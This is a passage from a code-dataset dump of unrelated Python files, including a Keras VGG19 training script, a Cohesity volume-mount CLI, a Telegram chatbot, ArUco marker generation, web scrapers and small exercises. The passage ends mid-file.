callbacks=callbacks_list)\r\nacc = history.history[\"val_acc\"]\r\npos = len(acc)-1\r\nmodel.save(f'VGG19_MeliponasImageDatastore227x227_ValAcc_{acc[-1]}.h5')\r\nmodel.save_weights(f'VGG19_MeliponasImageDatastore227x227_weights_ValAcc_{acc[-1]}.hdf5')\r\n\r\n\r\n\r\nprint(history.history.keys())\r\n\r\nplt.figure(1)\r\n\r\n# summarize history for accuracy\r\n\r\nplt.subplot(211)\r\nplt.plot(history.history['acc'])\r\nplt.plot(history.history['val_acc'])\r\nplt.title('model accuracy')\r\nplt.ylabel('accuracy')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'validation'], loc='upper left')\r\n\r\n# summarize history for loss\r\n\r\nplt.subplot(212)\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'validation'], loc='upper left')\r\nplt.show()\r\n\r\n","sub_path":"kerasVGG19.py","file_name":"kerasVGG19.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"552887066","text":"import os\nfrom puffer.api import API\nfrom puffer.managers.profiles import Profiles\n\nclient_id = os.environ['BUFFER_ID']\nclient_secret = os.environ['BUFFER_SECRET']\naccess_token = os.environ['BUFFER_TOKEN']\n\napi = API(client_id=client_id,\n client_secret=client_secret,\n access_token=access_token)\n\nprofile = Profiles(api=api).filter(service='twitter')[0]\n\ntweet = profile.updates.new\n","sub_path":"buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"509762655","text":"#!/usr/bin/env python\n\"\"\"Instant Volume Mount\"\"\"\n\n# usage: ./instantVolumeMount.py -v mycluster \\\n# -u myuser \\\n# -d mydomain.net \\\n# -s server1.mydomain.net \\\n# -t server2.mydomain.net \\\n# -n 'mydomain.net\\myuser' \\\n# -p swordfish\n\n# import pyhesity wrapper module\nfrom pyhesity import *\nfrom time import sleep\n\n# command line arguments\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-v', '--vip', type=str, required=True) # cluster to connect to\nparser.add_argument('-u', '--username', type=str, required=True) # username\nparser.add_argument('-d', '--domain', type=str, default='local') # (optional) domain - defaults to local\nparser.add_argument('-s', '--sourceserver', type=str, required=True) # job name\nparser.add_argument('-t', '--targetserver', type=str, default=None) # run date to archive in military format with 00 seconds\nparser.add_argument('-n', '--targetusername', type=str, default='') # (optional) will use policy retention if omitted\nparser.add_argument('-p', '--targetpassword', type=str, default='') # (optional) will use policy target if omitted\nparser.add_argument('-a', '--useexistingagent', action='store_true')\nparser.add_argument('-m', '--volume', action='append', type=str)\n\nargs = parser.parse_args()\n\nvip = args.vip\nusername = args.username\ndomain = args.domain\nsourceserver = args.sourceserver\ntargetserver = args.targetserver\ntargetusername = args.targetusername\ntargetpassword = args.targetpassword\nuseexistingagent = args.useexistingagent\nvolumes = args.volume\n\nif targetserver is None:\n targetserver = sourceserver\n\n# authenticate\napiauth(vip, username, domain)\n\n# find backups for source server\nsearchResults = api('get', '/searchvms?vmName=%s' % sourceserver)\nif searchResults:\n searchResults = [v for v in searchResults['vms'] if v['vmDocument']['objectName'].lower() == sourceserver.lower()]\n\nif len(searchResults) == 0:\n print(\"%s is not protected\" % sourceserver)\n exit(1)\n\n# find newest among multiple jobs\nsearchResult = sorted(searchResults, key=lambda result: result['vmDocument']['versions'][0]['snapshotTimestampUsecs'], reverse=True)[0]\ndoc = searchResult['vmDocument']\n\n# find source and target servers\nentities = api('get', '/entitiesOfType?awsEntityTypes=kEC2Instance&azureEntityTypes=kVirtualMachine&environmentTypes=kVMware&environmentTypes=kPhysical&environmentTypes=kView&environmentTypes=kGenericNas&environmentTypes=kIsilon&environmentTypes=kNetapp&environmentTypes=kAzure&environmentTypes=kAWS&environmentTypes=kGCP&gcpEntityTypes=kVirtualMachine&genericNasEntityTypes=kHost&isProtected=true&isilonEntityTypes=kMountPoint&netappEntityTypes=kVolume&physicalEntityTypes=kHost&viewEntityTypes=kView&vmwareEntityTypes=kVirtualMachine')\nsourceEntity = [e for e in entities if e['displayName'].lower() == sourceserver.lower()]\ntargetEntity = [e for e in entities if e['displayName'].lower() == targetserver.lower()]\n\nif len(sourceEntity) == 0:\n print(\"source server %s not found\")\n exit(1)\n\nif len(targetEntity) == 0:\n print(\"target server %s not found\")\n exit(1)\n\nmountTask = {\n 'name': 'myMountOperation',\n 'objects': [\n {\n 'jobId': doc['objectId']['jobId'],\n 'jobUid': doc['objectId']['jobUid'],\n 'entity': sourceEntity[0],\n 'jobInstanceId': doc['versions'][0]['instanceId']['jobInstanceId'],\n 'startTimeUsecs': doc['versions'][0]['instanceId']['jobStartTimeUsecs']\n }\n ],\n 'mountVolumesParams': {\n 'targetEntity': targetEntity[0],\n 
'vmwareParams': {\n 'bringDisksOnline': True,\n 'targetEntityCredentials': {\n 'username': targetusername,\n 'password': targetpassword\n }\n }\n }\n}\n\nif 'parentId' in targetEntity:\n mountTask['restoreParentSource'] = {'id': targetEntity['parentId']}\n\nif useexistingagent:\n mountTask['mountVolumesParams']['useExistingAgent'] = True\n\nif volumes is not None:\n mountTask['mountVolumesParams']['volumeNameVec'] = volumes\n\nprint(\"mounting volumes to %s...\" % targetserver)\nresult = api('post', '/restore', mountTask)\n\n# wait for completion\ntaskid = result['restoreTask']['performRestoreTaskState']['base']['taskId']\nfinishedStates = ['kCanceled', 'kSuccess', 'kFailure']\nstatus = 'unknown'\nwhile status not in finishedStates:\n sleep(3)\n restoreTask = api('get', '/restoretasks/%s' % taskid)\n status = restoreTask[0]['restoreTask']['performRestoreTaskState']['base']['publicStatus']\nprint(\"Volume mount ended with status %s\" % status)\nif status == 'kSuccess':\n print('Task ID for tearDown is: %s' % restoreTask[0]['restoreTask']['performRestoreTaskState']['base']['taskId'])\n mountPoints = restoreTask[0]['restoreTask']['performRestoreTaskState']['mountVolumesTaskState']['mountInfo']['mountVolumeResultVec']\n for mountPoint in mountPoints:\n print('%s mounted to %s' % (mountPoint['originalVolumeName'], mountPoint['mountPoint']))\n","sub_path":"python/instantVolumeMount/instantVolumeMount.py","file_name":"instantVolumeMount.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"510881325","text":"import asyncio\nimport functools\nimport os\nimport signal\nimport traceback\n\nfrom telethon import TelegramClient, events, sync\nfrom subprocess import Popen, PIPE\n\nfrom .bot import HermitBot\nfrom .cli import data_dir\n\n\nclass ShellObject:\n \"\"\"A Bourne Shell object handler for RiveScript.\"\"\"\n _objects = {}\n\n def load(self, name, code):\n source = \"\\n\".join(code)\n self._objects[name] = source\n\n def call(self, rs, name, user, fields):\n if not name in self._objects:\n return \"[ERR: Object Not Found]\"\n script = f'#!/usr/bin/env sh\\n'.encode('utf-8')\n vars = rs.get_uservars(user)\n for key, value in vars.items():\n if type(value) != str:\n continue\n script += f'{key}=\"{value}\"\\n'.encode('utf-8')\n script += self._objects[name].encode('utf-8')\n\n proc = Popen([\"sh\"], stdin=PIPE, stdout=PIPE)\n proc.stdin.write(script)\n proc.stdin.close()\n result = proc.stdout.read().decode('utf-8')\n return result\n\n\nAPP_TOKEN = os.environ['TELEGRAM_APP_TOKEN']\nBOT_TOKEN = os.environ['TELEGRAM_BOT_TOKEN']\nBOT_OWNER = os.environ['TELEGRAM_BOT_OWNER']\nBOT_OWNER_ID = int(os.environ['TELEGRAM_BOT_OWNER_ID'])\nBOT_NAME = os.environ['TELEGRAM_BOT_NAME']\napi_id, api_hash = APP_TOKEN.split(':')\napi_id = int(api_id)\n\nloop = asyncio.get_event_loop()\n\nclient = TelegramClient(BOT_NAME, api_id, api_hash)\n\nhermit = HermitBot(data_dir, debug=False)\n\n\ndef exit_on_signal(signal_name):\n print(\"Exiting on signal:\", signal_name)\n client.send_message(BOT_OWNER, 'I am going offline due to signal: ' + signal_name)\n client.disconnect()\n loop.stop()\n\n\ndef stop_on_error(func):\n async def wrapper(*args, **kwargs):\n try:\n return await func(*args, **kwargs)\n except Exception as e:\n await client.send_message(BOT_OWNER, 'Encountered error, shutting down. ```%s```' % traceback.format_exc())\n client.disconnect()\n loop.stop()\n\n return wrapper\n\n\n@client.on(events.NewMessage(pattern='reload'))\n@stop_on_error\nasync def reload_handler(event):\n if event.from_id != BOT_OWNER_ID:\n print(f\"Ignoring chat from {event.from_id}.\")\n return\n hermit.reload()\n await event.respond('Reloaded.')\n\n\n@client.on(events.NewMessage())\n@stop_on_error\nasync def handler(event):\n if event.from_id != BOT_OWNER_ID:\n print(f\"Ignoring chat from {event.from_id}.\")\n return\n elif event.raw_text == 'reload':\n return\n reply = hermit.reply(event.raw_text)\n if reply:\n await event.respond(reply)\n else:\n await event.respond('Received empty response.')\n\n\ndef main():\n try:\n for signame in ('SIGINT', 'SIGTERM'):\n loop.add_signal_handler(getattr(signal, signame),\n functools.partial(exit_on_signal, signame))\n client.connect()\n if not client.is_user_authorized():\n client.sign_in(bot_token=BOT_TOKEN)\n\n client.send_message(BOT_OWNER, 'I am online.')\n\n loop.run_forever()\n except KeyboardInterrupt:\n client.send_message(BOT_OWNER, 'I am going offline.')\n except Exception as e:\n client.send_message(BOT_OWNER, 'Encountered error, shutting down. ```%s```' % traceback.format_exc())\n finally:\n client.disconnect()\n loop.stop()\n","sub_path":"hermit/tg.py","file_name":"tg.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"302995375","text":"import numpy as np\nimport os\nfrom Funciones_importantes import barrido_polar, diferencia_angulos\nfrom skimage import filters\nfrom PIL import ImageEnhance\nfrom scipy import ndimage, misc\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\n\nclass Procesamiento_horero_minutero:\n\n def __init__(self, filename):\n self.filename = filename\n self.imagen = Image.open(self.filename).rotate(-90).convert('L')\n self.imagen_binaria = Image.open('mascara.png').convert('L')\n self.horero = None\n self.minutero = None\n self.lista_rectas = []\n\n def realizar_procesamiento(self):\n self.segmentar_reloj()\n self.centro_masa()\n self.lista_rectas = barrido_polar(self.centro, self.imagen)\n os.remove('./imagen_segmentada.png')\n\n def segmentar_reloj(self):\n '''Se procesa la imagen para que quede totalmente\n lista para luego buscarlas manecillas sin ningun problema'''\n #se carga la info de los pixeles de la imagen binaria previamente obtenida\n data_binario = self.imagen_binaria.load()\n # Se carga la info de los pixeles de la imagen original\n data = self.imagen.load()\n #Se recorre la imagen completa\n for x in range(0,self.imagen_binaria.size[0]):\n for y in range(0,self.imagen_binaria.size[1]):\n # Si el pixel no esta dentro de la region segmentada, el pixel se transforma a negro\n if data_binario[x,y] == 0:\n data[x,y] = 0\n plt.imshow(self.imagen, cmap='Greys_r')\n plt.title('RELOJ SEGMENTADO')\n plt.show()\n #Aumentamos el contraste de la imagen\n contr = ImageEnhance.Contrast(self.imagen)\n im = contr.enhance(1.5)\n self.imagen = im\n #Transformamos la imagen a matriz\n imagen = ndimage.rotate(self.imagen, 0)\n #Aplicamos otsu\n val = filters.threshold_otsu(imagen)\n arr = np.asarray(imagen>val)\n #Tranformamos la imagen en escala de grises a una imagen binaria\n self.imagen = ndimage.binary_opening(arr)\n #Se guarda la imagen binaria segmentada\n misc.imsave('imagen_segmentada.png',self.imagen)\n #Se carga la imagen\n self.imagen = Image.open('imagen_segmentada.png').convert('L')\n plt.imshow(self.imagen, cmap='Greys_r')\n plt.title('RELOJ BINARIO SEGMENTADO')\n plt.show()\n\n\n def centro_masa(self):\n '''Metodo que busca el centro de masa\n de la 'mascara' (region segmentada)'''\n c = ndimage.measurements.center_of_mass(ndimage.rotate(self.imagen_binaria,0))\n self.centro = (int(c[1]), int(c[0]))\n\n def buscar_minutero(self):\n 'Busca la manecilla correspondiente al minutero'\n max_ceros = 0\n #Itera sobre todas las rectas para encontrar la recta con mayor cantidad de ceros\n for recta in self.lista_rectas:\n ceros = recta.contar_ceros()\n if ceros > max_ceros:\n max_ceros = ceros\n self.minutero = recta\n plt.imshow(self.imagen, cmap='Greys_r')\n plt.scatter(self.centro[0], self.centro[1], c='red')\n plt.scatter(self.minutero.x2, self.minutero.y2, c='red')\n plt.scatter(self.minutero.centro[0], self.minutero.centro[1])\n plt.title('RESULTADO BUSQUEDA MINUTERO')\n plt.show()\n #Retorna el angulo del minutero\n return self.minutero.theta\n\n def buscar_horero(self):\n '''Busca la manecilla correspondiente al horero. 
Se debe\n buscar primeroel minutero para buscar el horero'''\n max_ceros = 0\n #Se itera sobre todas las rectas\n for recta in self.lista_rectas:\n ceros = recta.contar_ceros()\n #Si la recta tiene mas ceros que la anteriormente seleccionada, está ubicada a mas de 8 pixeles de\n #distancia del minutero en el eje x e y, y ademas tiene una diferencia de angulo de mas de 5 grados\n #con respecto al minutero\n if ceros > max_ceros and abs(recta.x2 - self.minutero.x2)>8 and abs(recta.y2 - self.minutero.y2)>8 and diferencia_angulos(self.minutero.theta, recta.theta)>5 :\n max_ceros = ceros\n self.horero = recta\n plt.imshow(self.imagen, cmap='Greys_r')\n plt.scatter(self.centro[0], self.centro[1], c='red')\n plt.scatter(self.horero.x2, self.horero.y2, c='red')\n plt.scatter(self.horero.centro[0], self.horero.centro[1])\n plt.title('RESULTADO BUSQUEDA HORERO')\n plt.show()\n return self.horero.theta","sub_path":"PROCESAMIENTO_DE_IMAGENES/T01/Procesamiento_horero_minutero.py","file_name":"Procesamiento_horero_minutero.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"87951063","text":"\n# Find the sum of all left leaves in a given binary tree.\n#\n# Example:\n#\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n#\n# There are two left leaves in the binary tree, with values 9 and 15 respectively. Return 24.\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def add_left_leaves(self, node, is_left):\n if not node:\n return 0\n return node.val if is_left and not node.left and not node.right \\\n else self.add_left_leaves(node.left, True) + self.add_left_leaves(node.right, False)\n\n def sumOfLeftLeaves(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n return 0 if not root \\\n else self.add_left_leaves(root.left, True) + self.add_left_leaves(root.right, False)\n\n\nif __name__ == '__main__':\n s = Solution()\n from LeetcodeProblems.tree.tree_node import TreeNode\n tree = TreeNode([5, 3, 6])\n print(s.sumOfLeftLeaves(tree))\n","sub_path":"LeetcodeProblems/tree/404_sum_of_left_leaves.py","file_name":"404_sum_of_left_leaves.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"89426823","text":"#!/usr/bin/env python\n\n\"\"\"\n\n\tAruco Marker Creation\n\n\t1.) Create 4 aruco markers images for chessboard corner detection.\n\n\t\t\t\t\t\t\t\tm0\t m1\n\t\t\t\t\t\t\t\t B\n\t\t\t\t\t\t\t\tm3 m2\n\n\t\t\t\t\t\t (marker arrangment)\n\n\t\t\twhere,\n\n\t\t\t\tmi ~ Aruco marker with associate id \"i\"\n\t\t\t\tB ~ Chessboard\n\n\t2.) Create json settings file.\n\n\n\tTODO: use marker images to calibrate camera in single step\n\n\"\"\"\n\n__author__ = \"l.j. Brown\"\n__version__ = \"1.0.3\"\n\n#\n#\n#\t\t\t\t\t\t\t\t\timports\t\n#\n#\n\n# internal\nimport json\nimport logging\n\n# external\nimport numpy as np\nimport cv2\nimport cv2.aruco as aruco\n\n#\n#\n#\t\t\t\t\t\t\t\t\tSettings\n#\n#\n\nARUCO_MARKER_SETTINGS_FNAME = \"aruco_markers/aruc_markers_settings.json\" \t\t# Do not change\naruco_markers_ftemplate = \"aruco_markers/aruco_%s.png\"\n\nmarker_size = 400\t# pixels\n\naruco_dict_id = aruco.DICT_6X6_250\ncorner_id_dict = {\n\t0 : 'top_left',\n\t1 : 'top_right',\n\t2 : 'bottom_right',\n\t3 : 'bottom_left'\n}\n\n#\n#\taruco marker settings dictonary\n#\n\nsettings_dict = {\n\t\"ARUCO_MARKER_SETTINGS_FNAME\" : ARUCO_MARKER_SETTINGS_FNAME,\n\t\"aruco_markers_ftemplate\" : aruco_markers_ftemplate,\n\t\"corner_id_dict\" : corner_id_dict,\n\t\"aruco_dict_id\" : aruco_dict_id,\n\t\"marker_size\" : marker_size\n}\n\n#\n#\n#\t\t\t\t\t\t\t\t\tLogging\n#\n#\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n#\n#\n#\t\t\t\t\t\t\t\t\tMethods\n#\n#\n\n#\n#\twrite settings to json file\n#\n\ndef write_settings_file(settings_dict):\n\n\t# retreive file name\n\tARUCO_MARKER_SETTINGS_FNAME = settings_dict[\"ARUCO_MARKER_SETTINGS_FNAME\"]\n\n\t# logger\n\tlogger.info(\"Writing aruco marker settings file (json file) too \\\"%s\\\"\" % ARUCO_MARKER_SETTINGS_FNAME)\n\n\t# write json file\n\twith open(ARUCO_MARKER_SETTINGS_FNAME, 'w') as outfile:\n\t json.dump(settings_dict, outfile)\n\n\t# logger\n\tlogger.info(\"Finished writing aruco marker settings file.\")\n\n\n#\n#\tcreate markers -- and write settings file\n#\n\ndef create_markers(settings_dict):\n\n\t# write settings dict to json file\n\twrite_settings_file(settings_dict)\n\n\t# get file template for individual aruco marker image\n\taruco_markers_ftemplate = settings_dict[\"aruco_markers_ftemplate\"]\n\n\t# load aruco dict\n\taruco_dict = aruco.Dictionary_get(settings_dict[\"aruco_dict_id\"])\n\n\t# get number of markers\n\tnMarkers = len(settings_dict[\"corner_id_dict\"])\n\t\n\t# get marker size\n\tmarkerSize = settings_dict[\"marker_size\"]\n\n\t# create marker image files and write them\n\tfor k,v in settings_dict[\"corner_id_dict\"].items():\n\t\tmarker_img = aruco.drawMarker(aruco_dict, k, markerSize)\n\t\tfpath = aruco_markers_ftemplate % v\n\n\t\t# logger\n\t\tlogger.info(\"Writing aruco marker image file to \\\"%s\\\"\" % fpath)\n\t\t\n\t\tcv2.imwrite(fpath, marker_img)\n\n\t# logger\n\tlogger.info(\"Finished writing aruco marker image files.\")\n\n#\n#\n#\t\t\t\t\t\t\t\tProgram\n#\n#\n\nif __name__ == \"__main__\":\n\n\t#\n\t# create marker images and settings file\n\t#\n\n\tcreate_markers(settings_dict)\n","sub_path":"chessboard_corner_detection/old_code/aruco_marker_creation_v3.py","file_name":"aruco_marker_creation_v3.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"527824937","text":"'''''Andressa 31786812, João Victor 31841287, Reinaldo 31877923'''''\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\ndf = pd.read_csv('axisdata.csv')\r\n\r\nvalor_max = df[\"Cars Sold\"].max()\r\n\r\nlista_valor_max = df.loc[df[\"Cars Sold\"] == valor_max]\r\n\r\nlista_nomes_max = lista_valor_max[\"Fname\"]\r\n\r\nprint(\"Os vendedores que atingiram essa marca foram:\\n{}\".format(lista_nomes_max))\r\n\r\nprint(\"A quantidade máxima de carros vendidos foi de: {}\".format(valor_max))","sub_path":"aula 1/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"180128511","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 21 19:22:47 2020\n@author: katharinaenin\n\"\"\"\n\n#Webscraper for AMA\n\nimport requests\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\n#starting page or root page\nroot_url='https://www.ama.org/marketing-news-archive/'\npage = requests.get(root_url).text\n\nsoup = BeautifulSoup(page, features=\"lxml\")\n\nlink_list = np.array([]);\n\nfile = open(\"OutputAMA.txt\",\"w\");\n\nnumber_article = 0;\n\n#get all the links to monthly archive pages\nfor a in soup.select('.wp-block-column h3 a'):\n link_list = np.append(link_list,a.get('href')); #alle Monatslinks\n \n \n#extract content \nfor month_link in link_list: \n \n #Load More Button entgehen\n url1 = month_link;\n url2 = month_link+'?paged=2';\n url3 = month_link+'?paged=3';\n month_links = [url1,url2,url3];\n \n for month_link_page in month_links: \n new_url = month_link_page;\n page = requests.get(new_url).text\n soup = BeautifulSoup(page, features=\"lxml\")\n \n for link in soup.findAll('a',{\"class\": \"content-card-url\"}):\n url = link.get('href');\n page = requests.get(url).text\n soup = BeautifulSoup(page)\n \n headline = soup.find('h1').get_text()\n sub_headline = soup.find('h2').get_text()\n p_tags = soup.find_all('p');\n p_tags_text = [tag.get_text().strip() for tag in p_tags] \n \n p_tags_text = p_tags_text[3:-2]\n file.writelines(headline);\n file.writelines(\"\\n\");\n file.writelines(sub_headline);\n file.writelines(\"\\n\");\n file.writelines(p_tags_text);\n file.writelines(\"\\n \\n\"); \n number_article = number_article + 1;\n \nfile.close();\n","sub_path":"webscraper4.py","file_name":"webscraper4.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"333871958","text":"from google.appengine.api import mail, app_identity\nimport logging\nfrom datetime import datetime\n\n\ndef send(recipients, subject, body):\n isHTML=True\n # print(\"recep: \"+recipients)\n logging.debug(u'Sending mail {} to {}'.format(subject, unicode(recipients)).encode(u'utf-8'))\n\n message = mail.EmailMessage(\n sender=u'Admin VeggsProno '.format(app_identity.get_application_id()),\n subject=subject,\n to=recipients\n )\n\n if isHTML:\n message.html = body\n else:\n message.body = body\n\n message.check_initialized()\n message.send()","sub_path":"src/blueprint/services/email_service.py","file_name":"email_service.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"94967370","text":"\"\"\"\n Learning persistence with Peewee and sqlite\n delete the database to start over\n (but running this program does not require it)\n\"\"\"\nimport logging\nfrom personjob_model import *\n\ndef populate_db():\n \"\"\"\n add person data to database\n \"\"\"\n\n logging.basicConfig(level=logging.INFO)\n logger = logging.getLogger(__name__)\n\n database = SqliteDatabase('personjob.db')\n\n logger.info('Working with Person class')\n logger.info('Note how I use constants and a list of tuples as a simple schema')\n logger.info('Normally you probably will have prompted for this from a user')\n\n dept_number = 0\n dept_name = 1\n dept_manager = 2\n\n department = [\n ('A001', 'Comms', 'Andy'),\n ('B002', 'Marketing', 'Tammy'),\n ('C003', 'Fancy', 'Beannie'),\n ]\n\n logger.info('Creating Person records: iterate through the list of tuples')\n logger.info('Prepare to explain any errors with exceptions')\n logger.info('and the transaction tells the database to fail on error')\n\n try:\n database.connect()\n database.execute_sql('PRAGMA foreign_keys = ON;')\n for department in department:\n with database.transaction():\n new_dept = Department.create(\n dept_number = department[dept_number],\n dept_name = department[dept_name],\n dept_manager = department[dept_manager])\n new_dept.save()\n logger.info('Database add successful')\n\n logger.info('Print the Department records we saved...')\n for saved_dept in Department:\n logger.info(f'{saved_dept.dept_number} department is for {saved_dept.dept_name} ' +\\\n f'and likes to be known as {saved_dept.dept_manager}')\n\n except Exception as e:\n logger.info(f'Error creating = {department[dept_number]}')\n logger.info(e)\n logger.info('See how the database protects our data')\n\n finally:\n logger.info('database closes')\n database.close()\n\nif __name__ == '__main__':\n populate_db()","sub_path":"Student/tammyd_Py220/Py220_lesson07/RDBMS-example-master/use_these/personjob_learning_v3_p1.py","file_name":"personjob_learning_v3_p1.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"322308772","text":"def main():\n print(\"Please enter a number to represent the age of the child.\")\n age_in_years = int(input())\n age_in_months = convert_to_months(age_in_years)\n print(\"The age of the camper in months is:\",age_in_months)\n\n\ndef convert_to_months(years):\n age = years * 12\n\n return (age)\n\n\nif __name__ == '__main__':\n main()\n\n\n#bugs: In the initial draft of the program,\n#I had the print statement called like is:+age_in_months)\n#This had the odd side effect of printing out none of the correct values.( the year repeated 6-8 times)\n#This is apparently because the + operation in the print statement is only for strings.\n\n","sub_path":"Classes/Python/Module 2/main/camper_age_input.py","file_name":"camper_age_input.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"305425784","text":"from linebot import LineBotApi\r\nfrom linebot.models import TextSendMessage\r\n\r\n# リモートリポジトリに\"ご自身のチャネルのアクセストークン\"をpushするのは、避けてください。\r\n# 理由は、そのアクセストークンがあれば、あなたになりすまして、プッシュ通知を遅れてしまうからです。\r\nLINE_CHANNEL_ACCESS_TOKEN = \"ご自身のチャネルのアクセストークン\"\r\n\r\nline_bot_api = LineBotApi(LINE_CHANNEL_ACCESS_TOKEN)\r\n\r\n\r\ndef main():\r\n user_id = \"プッシュ通知を送りたLINEユーザーのuser_id\"\r\n\r\n messages = TextSendMessage(text=f\"こんにちは😁\\n\\n\"\r\n f\"最近はいかがお過ごしでしょうか?\")\r\n line_bot_api.push_message(user_id, messages=messages)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"push_message.py","file_name":"push_message.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"51089621","text":"import iemdb, numpy\nimport datetime\nCOOP = iemdb.connect('coop', bypass=True)\nccursor = COOP.cursor()\n\nccursor.execute(\"\"\"select o.station, o.day, o.high, c.high, o.low, c.low from \n alldata_ia o JOIN climate c ON \n (c.station = o.station and to_char(c.valid, 'mmdd') = o.sday) \n and o.station = 'IA0200' and o.day >= '2012-12-01' ORDER by day ASC\"\"\")\n\ndays = []\ndays2 = []\nohighs = []\nolows = []\nchighs = []\nclows = []\nfor row in ccursor:\n days.append( datetime.datetime(row[1].year, row[1].month, row[1].day, 0) - datetime.timedelta(hours=6) )\n days2.append( datetime.datetime(row[1].year, row[1].month, row[1].day, 0) )\n ohighs.append( row[2] )\n chighs.append( row[3] )\n olows.append( row[4] )\n clows.append( row[5] )\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects as PathEffects\n\n(fig, ax) = plt.subplots(1, 1)\n\nax.bar(days, ohighs, width=0.25, fc='r', ec='r', label=\"High\")\nax.bar(days2, olows, width=0.25, fc='b', ec='b', label=\"Low\")\n\nax.plot(days, chighs, linewidth=4, zorder=2, color='k')\nax.plot(days, chighs, linewidth=2, zorder=2, color='r')\nax.plot(days, clows, linewidth=4, zorder=2, color='k')\nax.plot(days, clows, linewidth=2, zorder=2, color='b')\nax.set_xlim(datetime.datetime(2012,11,29,23),datetime.datetime(2013,1,7))\n#ax.set_ylim(50,85)\nax.annotate(\"19-20 Dec Snowstorm\", xy=(datetime.datetime(2012,12,20), 35), xycoords='data',\n xytext=(10, 50), textcoords='offset points',\n bbox=dict(boxstyle=\"round\", fc=\"0.8\"),\n arrowprops=dict(arrowstyle=\"->\",\n connectionstyle=\"angle3,angleA=0,angleB=-90\"))\n \nax.grid(True)\nax.set_title(\"1 Dec 2012 - 7 Jan 2013 : Ames Daily Temperatures\")\n#ax.set_xlabel(\"16-20 Forecasted\")\nax.set_ylabel(\"Temperature $^{\\circ}\\mathrm{F}$\")\nax.legend()\nfig.savefig('test.ps')\nimport iemplot\niemplot.makefeature('test')\n","sub_path":"scripts/feature/daily_climate.py","file_name":"daily_climate.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"464413847","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pyvirtualdisplay import Display\nfrom urllib.parse import urljoin, urlparse, parse_qsl, unquote_plus\nimport random\nimport re\nimport sys\n\nfrom linkFollow import LinkFollow\nimport redirectChainExtractor as rce\nfrom config import Config\n\ndef getMovieTitles():\n\n movieTitles = set()\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'}\n years = ['2019','2018','2017','2016','2015']\n # Movie titles\n for year in years:\n url = 'https://www.boxofficemojo.com/yearly/chart/?view=releasedate&view2=domestic&yr='+year+'&p=.htm'\n page = requests.get(url,headers=headers)\n soup = BeautifulSoup(page.text, 'html.parser')\n links = soup.find_all('a')\n for link in links:\n if(link.has_attr('href') and link['href'].startswith('/movies/?id=')):\n title = re.sub('[^0-9a-zA-Z]+', ' ', link.text.lower())\n title = ' '.join([x for x in title.split(' ') if len(x) > 3])\n if(len(title) > 5):\n movieTitles.add(title)\n # Load TV series titles\n seriesTitles = set()\n url = 'https://www.imdb.com/search/title?title_type=tv_series&view=simple&sort=moviemeter,asc&start=1&count=200'\n page = requests.get(url,headers=headers)\n soup = BeautifulSoup(page.text, 'html.parser')\n titleDivs = soup.find_all('div', {'class': 'lister-col-wrapper'})\n for titleDiv in titleDivs:\n link = titleDiv.find('a')\n title = re.sub('[^0-9a-zA-Z]+', ' ', link.text.lower())\n title = ' '.join([x for x in title.split(' ') if len(x) > 3])\n if(len(title) > 5 and title not in movieTitles):\n seriesTitles.add(title)\n print('Number of movie titles loaded: ',len(movieTitles))\n print('Number of series titles loaded: ',len(seriesTitles))\n return [x.split(' ') for x in movieTitles], [x.split(' ') for x in seriesTitles]\n \n\ndef 